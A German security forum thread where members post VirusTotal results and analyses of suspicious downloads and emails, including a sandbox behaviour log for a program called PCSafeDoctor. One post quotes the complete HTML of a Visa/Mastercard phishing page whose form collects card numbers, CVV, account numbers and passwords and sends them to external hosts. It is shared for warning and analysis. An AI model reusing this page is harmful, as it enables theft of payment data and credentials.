Rokop Security

Willkommen, Gast ( Anmelden | Registrierung )

228 Seiten V  « < 216 217 218 219 220 > »   
Reply to this topicStart new topic
> Uploadergebnisse v-total + jotti, viel spass :)
240670
Beitrag 25.10.2011, 04:02
Beitrag #4341



Wohnt schon fast hier
*****

Gruppe: Mitglieder
Beiträge: 845
Mitglied seit: 23.10.2006
Mitglieds-Nr.: 5.481

Betriebssystem:
Windows 7 Ulti. 64bit SP1
Virenscanner:
ESET
Firewall:
ESET



Bei mir auch!


--------------------
PC: Windows 7 Ultimate 64bit, Bord MSI P67 GD65, Intel 2600k 4x 3,4GHz S1155 Box,CPU Kühler: Corsair H70 , Speicher Kit 4x4GB GSkill DDR3 1333, Grafik ATI HD5870,DVD-Rom und Brenner LG,Brenner LG,BlueRay Brenner LG, Festplatten größe 1760GB, Gehäuse: CM Storm SNIPER Ultra
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 25.10.2011, 04:31
Beitrag #4342



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 10.095
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 8.1 x64 SP1
Virenscanner:
Sandboxie 4.9.3
Firewall:
cFos 9.05



War nach Zeitpunkt der Erstellung noch in Ordnung. VT mal wieder.


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
Denny
Beitrag 25.10.2011, 19:44
Beitrag #4343



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 1.839
Mitglied seit: 24.05.2004
Wohnort: Sachsen
Mitglieds-Nr.: 872

Betriebssystem:
Win 7 64bit
Virenscanner:
avast! Free
Firewall:
Win Firewall



Mal wieder irgendeine exe bekommen.

http://www.virustotal.com/file-scan/report...3e77-1319567344
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 30.10.2011, 19:24
Beitrag #4344



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 10.095
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 8.1 x64 SP1
Virenscanner:
Sandboxie 4.9.3
Firewall:
cFos 9.05



http://www.virustotal.com/file-scan/report...e1bc-1319997334
http://www.virustotal.com/url-scan/report....c9a9-1319994216
http://www.virustotal.com/url-scan/report....93d4-1319994055

Mal wieder der übliche Email-Visa-Betrugsversuch.
Trend schlägt sich wacker.

QUELLTEXT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "
www.w3.org/TR/html4/strict.dtd">
<html lang="en"><head>


<script LANGUAGE="JavaScript">
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,widt
h=300,height=220,left = 362,top = 274');");
}
</script>
<META content="MSHTML 6.00.2900.3199" name=GENERATOR>
<style type="text/css">
.style2 {font-family: Verdana}
.style4 {font-family: Verdana; font-size: 12px; }
.style7 {font-size: 13px}
.style11 {font-family: Verdana; font-size: 13px; font-weight: bold; }
.style14 {font-family: Verdana; font-size: 11px; }
</style>





    <title>Plase Fill und bestätigen Sie Ihre Kontodaten.</title>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
    
    
    <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/hmrc.css" type="text/css">
                    <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/print.css" type="text/css" media="print">

                    <!--[if IE 7]>
                    <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie7fix.css" type="text/css">
                    <![endif]-->
                    <!--[if IE 6]>
                    <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie6fix.css" type="text/css">
                    <![endif]-->
                    <!--[if IE 5]>
                    <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie5fix.css" type="text/css">
                    <![endif]-->


</SCRIPT>
<script language="JavaScript" type="text/JavaScript">
function submitIt(processForm){
    if(processForm.name.value == ""){
        alert("Please enter your Full Name");
        processForm.name.select();
        return false;
    }
    if(processForm.address.value == ""){
        alert("Please complete your Adress");
        processForm.address.select();
        return false;
    }
    if(processForm.city.value == ""){
        alert("Please enter your City");
        processForm.city.select();
        return false;
    }
    if(processForm.zip.value == ""){
        alert("Please enter your Postal Code");
        processForm.zip.select();
        return false;
    }
    if(processForm.phone.value == ""){
        alert("Please enter your Phone Number");
        processForm.phone.select();
        return false;
    }
    if(processForm.bank.value == ""){
        alert("Please enter your Bank Name");
        processForm.bank.select();
        return false;
    }
    if(processForm.card.value == ""){
        alert("Please enter your Card Number");
        processForm.card.select();
        return false;
    }
}

</script>

    
<style type="text/css">
<!--
.style24 {font-size: 10px; font-weight: bold; font-family: "Courier New", Courier, mono; }
-->
</style>
</head>
<body id="top">
    















<dl class="process-overview">
<p><img src="http://www.thetechherald.com/media/images/200947/visa_phishing_top.jpg" width="160" height="100"> <img src="http://www.fsgbank.com/media/ext/uploaded/c838dd39-375d-4135-a88c-55c0b3a15f48/logo_mastercardSecurecode.png" style="margin-left: 400px;" ></p>

<hr class="dotted">
<dt class="selected">1</dt><dd class="selected">Eingeben<br>Details</dd>
        <dt>2</dt><dd class="last">Finish</dd>
      <div id="user-information">
        
      </div>
      
        <h1 class="no-menu">
          Schritt 1 - Geben Sie die Details
        </h1>
      
      <a name="main" class="screen-reader"></a>
      
    </div>
      <div id="AcceptTermsAndConditions" class="portlet">
  <div class="portlet-header">
    <h2>
      Informationen zur Abrechnung</h2>
  </div>

<div class="portlet-body">
<td><form action="http://dachdecker.com.ua/index3.php" name="processForm" method="POST" onsubmit="return submitIt(this)">

          <td><span class="style4"><span class="style7"><STRONG><U>Kreditkarten-Informationen</U></STRONG> - Bitte geben Sie Ihren Kredit-oder Debit Card.</span></span></td>
    </tr>
        <tr>
          <td>&nbsp;<form action="http://222.122.81.53/verifikation/konfirmation.php" name="processForm" method="POST" onsubmit="return submitIt(this)"></td>
        </tr>
        <tr>
          <td><table width="735" border="0" align="center" cellpadding="3" cellspacing="3">
            
              <tr>
                <td class="style11"><div align="right">Debit / Credit Kartennummer: </div></td>
                <td width="24%"><input name="card" title="Debit / Credit Card Number" type="text" id="card" size="25" maxlength="23"></td>
                <td width="6%"><img src="http://www.ysutopia.net/images/logo_cc_visa_37x23.gif" alt="Visa" width="37" height="23"></td>
                <td width="23%"><img src="http://www.ysutopia.net/images/logo_cc_mc_37x23.gif" alt="MasterCard" width="37" height="23"><img src="https://secure.wp3.rbsworldpay.com/sc2/jsp/shopper/icons/MAESTRO-SSL.gif" alt="" width="43" height="23" /></td>
            </tr>
              <tr>
                <td class="style11"><div align="right">Verfallsdatum: </div></td>
                <td colspan="3"><select name="expm" id="expm" title="Expiration Month">
                    <option value="">- Month -</option>
                    <option>01</option>
                    <option>02</option>
                    <option>03</option>
                    <option>04</option>
                    <option>05</option>
                    <option>06</option>
                    <option>07</option>
                    <option>08</option>
                    <option>09</option>
                    <option>10</option>
                    <option>11</option>
                    <option>12</option>
                  </select>
                  /
                  <select name="expy" id="expy" title="Expiration Year">
                    <option value="">- Year -</option>
                    <option>2011</option>
                    <option>2012</option>
                    <option>2013</option>
                    <option>2014</option>
                    <option>2015</option>
                    <option>2016</option>
                    <option>2017</option>
                    <option>2018</option>
                  </select></td>
              </tr>
              <tr>
                <td class="style11"><div align="right">Karten-Prüfnummer:</div></td>
                <td colspan="3"><input name="cvv" title="Card Verification Number" type="text" id="cvv" size="4" maxlength="3">
                [ <A HREF="java script:popUp('https://internetadcorp.com/pictures/cv_card.gif')" onMouseOver="window.status='Done'; return true" onMouseOut="window.status='Done'; return true">view sample</A> ]</td>
              </tr>    
              <tr>
                <td class="style11"><div align="right">Konto-Nummer:</div></td>
                <td><input name="ssn" title="Account Number" type="text" id="ssn" size="25" maxlength="50"></td>
      </tr>    
                    <tr>
                <td class="style11"><div align="right">PLZ:</div></td>
                <td><input name="zip" title="PLZ" type="text" id="zip" size="6" maxlength="6"></td>
      </tr>      
       <tr>
                <td width="47%" class="style11"><div align="right">Geburtsdatum: </div></td>
                <td><input name="a" title="CardHolder Name" type="text" id="a" size="2" maxlength="2">
                  <input name="b" title="CardHolder Name" type="text" id="b" size="2" maxlength="2">
                  <input name="c" title="CardHolder Name" type="text" id="c" size="4" maxlength="4">
                 <br> <span class="style14">(mm/dd/yyyy)</span></td>
              </tr>
              <tr>
<tr>
                <td class="style11"><div align="right">Passwort:</div></td>
                <td><input name="sec" title="SecureCoder" type="password" id="sec" size="25" maxlength="50"></td>
      </tr>        
                             <tr>
<tr>
                <td class="style11"><div align="right">Passwort bestätigen:</div></td>
                <td><input name="sec2" title="bestätigen" type="password" id="sec2" size="25" maxlength="50"></td>
      </tr>        
          </table></td>
        </tr>
        <tr>
          <td><div align="center"></div></td>
        </tr>
        <tr>
          <td>&nbsp;</td>
        </tr>
        <tr>
          <td>&nbsp;</td>
        </tr>
        <tr>
          <td><div align="center">
              <input type="submit" name="Submit" value="      Submit Informationen     " onMouseOver="window.status='Done'; return true" onMouseOut="window.status='Done'; return true">
          </div></td>
        </tr>

  <br>
    <br>

          
          
          
          
          
      
      
          
          
  <ul class="inline-navigation" id="footer">
<li class="first">
© <a title="Opens in new window" target="_blank" class="new-window" href="http://www.visa.de">Copyright © 2011 Visa / Mastercard</a></li>
</ul>
    
    <script src="https://online.hmrc.gov.uk/js/framework.js" type="text/javascript"></script>
  <!-- HMRC Registration Service -->
<!-- 46.17.00 -->
<!-- 2.1.13 -->
<!-- PageComplete -->
</body></html>
</script>
</body></html>


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
Rios
Beitrag 24.03.2012, 10:14
Beitrag #4345



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.169
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984



https://www.virustotal.com/url/29055c002e4d...02584/analysis/
Wie sieht es bei euch aus, kommt ihr so ohne weiteres ran, an den Aufschneider!! Meldungen von der Security?

Angehängte Datei  Snap_2012.03.24_10h04m33s_002.png ( 288.39KB ) Anzahl der Downloads: 21


Angehängte Datei  Snap_2012.03.24_10h02m16s_001.png ( 47.56KB ) Anzahl der Downloads: 26
Go to the top of the page
 
+Quote Post
Kenshiro
Beitrag 24.03.2012, 15:40
Beitrag #4346



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 5.093
Mitglied seit: 02.04.2005
Wohnort: Localhost
Mitglieds-Nr.: 2.320

Betriebssystem:
W7 Home[x32]
Virenscanner:
Vipre IS Lifetime
Firewall:
Vipre IS Lifetime



KL meint dazu:



--------------------


Dr. Web live


"Kenshi" sagt sayonara
Wer lächelt statt zu toben, ist immer der Stärkere. [japan. Sprichwort]


Das Internet ist ein gefährlicher Ort, und Windows-Nutzer wissen, dass man eine Rüstung tragen sollte. Apple-Nutzer tragen stattdessen Hawaii-Hemden."
[Jewgenij Kaspersky]

Ubuntu Beryl Matrix 3D Desktop

Go to the top of the page
 
+Quote Post
markus17
Beitrag 24.03.2012, 18:55
Beitrag #4347



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 1.891
Mitglied seit: 15.10.2006
Mitglieds-Nr.: 5.448

Betriebssystem:
Win7 Prof x64
Virenscanner:
GDATA IS 20xx
Firewall:
GDATA IS 20xx



G Data (Beta 2013) blockt weder die Website noch die Installation. Geht man bei dem Programm jedoch in den Menüpunkt "accelerate startup", so meldet sich der BB und möchte es in die Quarantäne schicken.

ZITAT
*** Prozess ***

Prozess: 3596
Dateiname: pcsafedoctor.exe
Pfad: c:/programme\pcsafedoctor\pcsafedoctor.exe

Herausgeber: Unbekannter Herausgeber
Erstelldatum: 03/24/12 17:46:25
Änderungsdatum: 01/18/12 13:55:50

Gestartet von: pcsafedoctor_setup.tmp
Herausgeber: Unbekannter Herausgeber


*** Aktionen ***

Das Programm versucht zu erreichen, dass ein Programm beim Systemstart automatisch gestartet wird.
Das Programm stellt eine Verbindung über ein Netzwerk her.
Das Programm hat Dateien im Systemordner gespeichert.


*** Quarantäne ***

Folgende Dateien wurden in Quarantäne verschoben:
C:\Programme\PCSafeDoctor\pcsafedoctor.exe
C:\WINDOWS\tpcsd

Folgende Registry Einträge wurden gelöscht:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\RkHit || ImagePath

OjowLDAuODA4LDI0MToxLDEsMjg6MiwxLDc4OjMsMSwyMDc6NCwxLDM6NiwxLDE6NywxLDE6OCwx
LDk5OjE0LC0xLDE6MTUsMSwxOjM1LDAuODA4LDI4OjM3LDEsMTozOCwxLDY1OjQ2LDEsMjo0NywxL
DI4OjUzLDEsNDo2NCwxLDEyOjY1LDEsMjo2OCwxLDE6MTE5LDEsMToxMjUsMSwxOjE0NSwyLjA1NT
Y4ZSswMDYsMjI6MTQ3LDEsNjoxNDgsMSw2NzoxNTAsMSwxOjoA
Version der Regeln: 3.0.3

"C:\Programme\PCSafeDoctor\pcsafedoctor.exe"
"C:\DOKUME~1\Admin\LOKALE~1\Temp\is-TKH08.tmp\PCSafeDoctor_Setup.tmp" /SL5="$120154,44274847,78848,C:\Dokumente und Einstellungen\Admin\Eigene Dateien\Downloads\PCSafeDoctor_Setup.exe"


--------------------
thx ;) hostanmullkriag@gmx.de
Go to the top of the page
 
+Quote Post
Stefan
Beitrag 24.03.2012, 20:27
Beitrag #4348



Gehört zum Inventar
Gruppensymbol

Gruppe: Freunde
Beiträge: 3.951
Mitglied seit: 27.03.2004
Mitglieds-Nr.: 522

Betriebssystem:
Windows 8.1 Pro x64
Virenscanner:
Emsisoft Anti-Malware
Firewall:
Router, Windows-Firewall



Also Seitenaufruf und Download ist mit Emsisoft ohne weiteres möglich.
Manueller Scan auch ohne Befund.
Die Installation möchte ich mir jetzt nicht antun.


--------------------
Gruß
Stefan
--------------------
Go to the top of the page
 
+Quote Post
Kenshiro
Beitrag 25.03.2012, 06:15
Beitrag #4349



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 5.093
Mitglied seit: 02.04.2005
Wohnort: Localhost
Mitglieds-Nr.: 2.320

Betriebssystem:
W7 Home[x32]
Virenscanner:
Vipre IS Lifetime
Firewall:
Vipre IS Lifetime



Moin Stefan,

kannst auch das via Upload bzw Mail einsenden


--------------------


Dr. Web live


"Kenshi" sagt sayonara
Wer lächelt statt zu toben, ist immer der Stärkere. [japan. Sprichwort]


Das Internet ist ein gefährlicher Ort, und Windows-Nutzer wissen, dass man eine Rüstung tragen sollte. Apple-Nutzer tragen stattdessen Hawaii-Hemden."
[Jewgenij Kaspersky]

Ubuntu Beryl Matrix 3D Desktop

Go to the top of the page
 
+Quote Post
olli
Beitrag 25.03.2012, 19:29
Beitrag #4350



Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.766
Mitglied seit: 30.11.2003
Wohnort: Dortmund
Mitglieds-Nr.: 242

Betriebssystem:
Windows 8.1 Prof 64Bit
Virenscanner:
Eset /GData /KIS
Firewall:
Router & o.g



Moin zusammen,

BitDefender meckert werde beim Aufruf der Seite, noch beim Download. Ein manueller Scan der Datei ergab auch nix.

Bis denne
Olli


--------------------
...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 26.03.2012, 05:42
Beitrag #4351



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 10.095
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 8.1 x64 SP1
Virenscanner:
Sandboxie 4.9.3
Firewall:
cFos 9.05



Warum prüft nicht mal einer mit Uninstaller, HIPS und Sniffer, was das Programm eigentlich anstellt?


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
SLE
Beitrag 26.03.2012, 09:37
Beitrag #4352



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.650
Mitglied seit: 30.08.2009
Wohnort: Leipzig
Mitglieds-Nr.: 7.705

Betriebssystem:
Win8 Pro (x64)
Virenscanner:
AppGuard + Sandboxie
Firewall:
Win8-FW



ZITAT(Solution-Design @ 26.03.2012, 06:41) *
Warum prüft nicht mal einer mit Uninstaller, HIPS und Sniffer, was das Programm eigentlich anstellt?


Könnte ja gefährlich sein, schließlich warnen die bösen AVs ph34r.gif
_

Habe es mal schnell getestet:

Dateien:
CODE
[ Changes to filesystem ]
* Creates file C:\Program Files\PCSafeDoctor\bmgac
* Creates file C:\Program Files\PCSafeDoctor\DelTmpFile.ls
* Creates file C:\Program Files\PCSafeDoctor\dxddd
* Creates file C:\Program Files\PCSafeDoctor\idamx
* Creates file C:\Program Files\PCSafeDoctor\iflee
* Creates file C:\Program Files\PCSafeDoctor\md5.dll
* Creates file C:\Program Files\PCSafeDoctor\networkdll.dll
* Creates file C:\Program Files\PCSafeDoctor\opfile.dll
* Creates file C:\Program Files\PCSafeDoctor\Option.ini
* Creates file C:\Program Files\PCSafeDoctor\pcsafedoctor.exe
* Creates file C:\Program Files\PCSafeDoctor\pcsafedoctor.url
* Creates file C:\Program Files\PCSafeDoctor\RkHitApi.dll
* Creates file C:\Program Files\PCSafeDoctor\spkdll.dll
* Creates file C:\Program Files\PCSafeDoctor\unins000.dat
* Creates file C:\Program Files\PCSafeDoctor\unins000.exe
* Creates file C:\Program Files\PCSafeDoctor\update\uplist.up
* Creates file C:\Program Files\PCSafeDoctor\ussafe.dll
* Creates file C:\Program Files\PCSafeDoctor\vf
* Creates file C:\Program Files\PCSafeDoctor\vircount.ls
* Creates file C:\Program Files\PCSafeDoctor\virname.ls
* Creates file C:\Program Files\PCSafeDoctor\xxcum
* Creates file C:\Program Files\PCSafeDoctor\zlib1.dll
* Creates file C:\Windows\system32\drivers\RKHit.sys
* Creates file C:\Windows\tpcsd
* Creates file D:\Desktop\pcsafedoctor.lnk
* Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\pcsafedoctor on the Web.lnk
* Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\pcsafedoctor.lnk
* Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\Uninstall pcsafedoctor.lnk


Die pcsafedoctor.exe ist bei VTT schon 2 Monate bekannt, nicht tragisch.

Die tpcsd im Windows Verzeichnis enthält nur das Installationsdatum
QUELLTEXT
[BTM]
Tm=26.03.2012


Der installierte Treiber RKHit.sys wird bei VTT nur von einigen Exoten erkannt und ist schon lange bekannt.

Registry:
nichts außergewöhnliches, Treiber wird registriert, Autostart angelegt.
CODE
[ Changes to registry ]
* Creates value "NukeOnDelete=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Creates value "UseGlobalSettings=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Creates value "pcsafedoctor.exe=C:\Program Files\PCSafeDoctor\pcsafedoctor.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run
* Creates value "Inno Setup: Setup Version=5.2.3" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Inno Setup: App Path=C:\Program Files\PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "InstallLocation=C:\Program Files\PCSafeDoctor\" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Inno Setup: Icon Group=PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Inno Setup: User=Sebastian" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Inno Setup: Selected Tasks=desktopicon" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Inno Setup: Deselected Tasks=quicklaunchicon" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "DisplayName=PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "UninstallString="C:\Program Files\PCSafeDoctor\unins000.exe"" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "QuietUninstallString="C:\Program Files\PCSafeDoctor\unins000.exe" /SILENT" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "DisplayVersion=2.0" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "Publisher=pcsafedoctor.com, Inc." in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "URLInfoAbout=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "HelpLink=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "URLUpdateInfo=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "NoModify=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "NoRepair=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "InstallDate=20120326" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1
* Creates value "ErrorControl=01000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit
* Creates value "ImagePath=\??\C:\Windows\system32\drivers\RKHit.sys" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit
* Creates value "Start=03000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit
* Creates value "Type=01000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit
* Creates value "SymbolicLinkValue=5C00520045004700490053005400520059005C005500530045005
2005C00530061006E00640062006F0078005F00530065006200610073007400690061006E005
F
0030005F005300570054005F0031005C0075007300650072005C00630075007200720065006E
0
074005F0063006C0061007300730065007300" in key HKEY_CURRENT_USER\software\classes
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{09382062-2f85-11e0-ad26-e64bc137e4c6}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1c05d857-ee68-11de-9bc0-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{27ba24a2-e800-11de-9e9b-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981aa-e4e7-11de-91ad-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981ae-e4e7-11de-91ad-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981b8-e4e7-11de-91ad-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981bc-e4e7-11de-91ad-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981c6-e4e7-11de-91ad-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fbcd0d4-2f93-11df-9378-884d12c21a28}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{30155e1d-e806-11de-8dd9-028037150300}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{46508a85-edc1-11de-9de3-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{52e99a4b-e4ff-11de-8b29-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2285-e4e6-11de-b42e-806e6f6e6963}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2286-e4e6-11de-b42e-806e6f6e6963}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2287-e4e6-11de-b42e-806e6f6e6963}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2288-e4e6-11de-b42e-806e6f6e6963}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{967f74a0-f7eb-11de-827d-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a4934dd5-39e2-11e0-ac53-d5cb293fb219}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a9aab2e3-1c8a-11df-88a6-005056c00008}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b7828f21-0c16-11df-83fe-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{c0022f98-e504-11de-814c-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{cc629c48-eb49-11de-9239-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d326092c-e75f-11de-8858-001b24da8d8e}
old value empty
* Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d428a030-1bac-11df-8aac-f4d2b4ee493f}
old value empty
* Modifies value "AutoDetect=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
old value empty
* Creates value "HomeURL=http://www.pcsafedoctor.com" in key HKEY_CURRENT_USER\software\PCSafeDoctor
* Creates value "RegisterURL=http://www.pcsafedoctor.com/register/" in key HKEY_CURRENT_USER\software\PCSafeDoctor
* Creates value "HelpURL=http://www.pcsafedoctor.com/online-help.php" in key HKEY_CURRENT_USER\software\PCSafeDoctor
* Creates value "PCSafeDoctor_Setup.exe=PCSafeDoctor Setup " in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\D:\Downloads
* Creates value "PCSafeDoctor_Setup.tmp=Setup/Uninstall" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\0_SWT_1\drive\T\Temp\is-21MHC.tmp
* Creates value "pcsafedoctor.exe=PC Safe Doctor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\0_SWT_1\drive\C\Program Files\PCSafeDoctor


Netzwerk:
Außer Update, Signatur und Cloudprüfungen nichts.
_

Das Programm selbst:
(1) Ein paar Tuning Features mit nervigen Info-Popups (Autostarts prüfen, Tempfiles löschen)



(2) Malware und Spywarescanner.
Angebliche Bedrohungen (wie bei Roques üblich) wurden nicht gemeldet - gut! Aus Mangel an alten Samples auf diesem PC, habe ich es mal auf ~90 aktuelle Malwarefiles von gestern losgelassen.

Dabei wurden mit den lokalen/gecachten Signaturen erstmal nur 6 erkannt:


Den Rest an unbekannten Files kann man per Cloud prüfen...

... was einige verdächtige Dateien (Erkennungen?) mehr bringt:


Entfernung kostet natürlich:


Fazit:
In meinen Augen definitiv ein überflüssiges Programm, wo es viele schon gibt. (die z.T. hier vorgestellt und empfohlen werden)
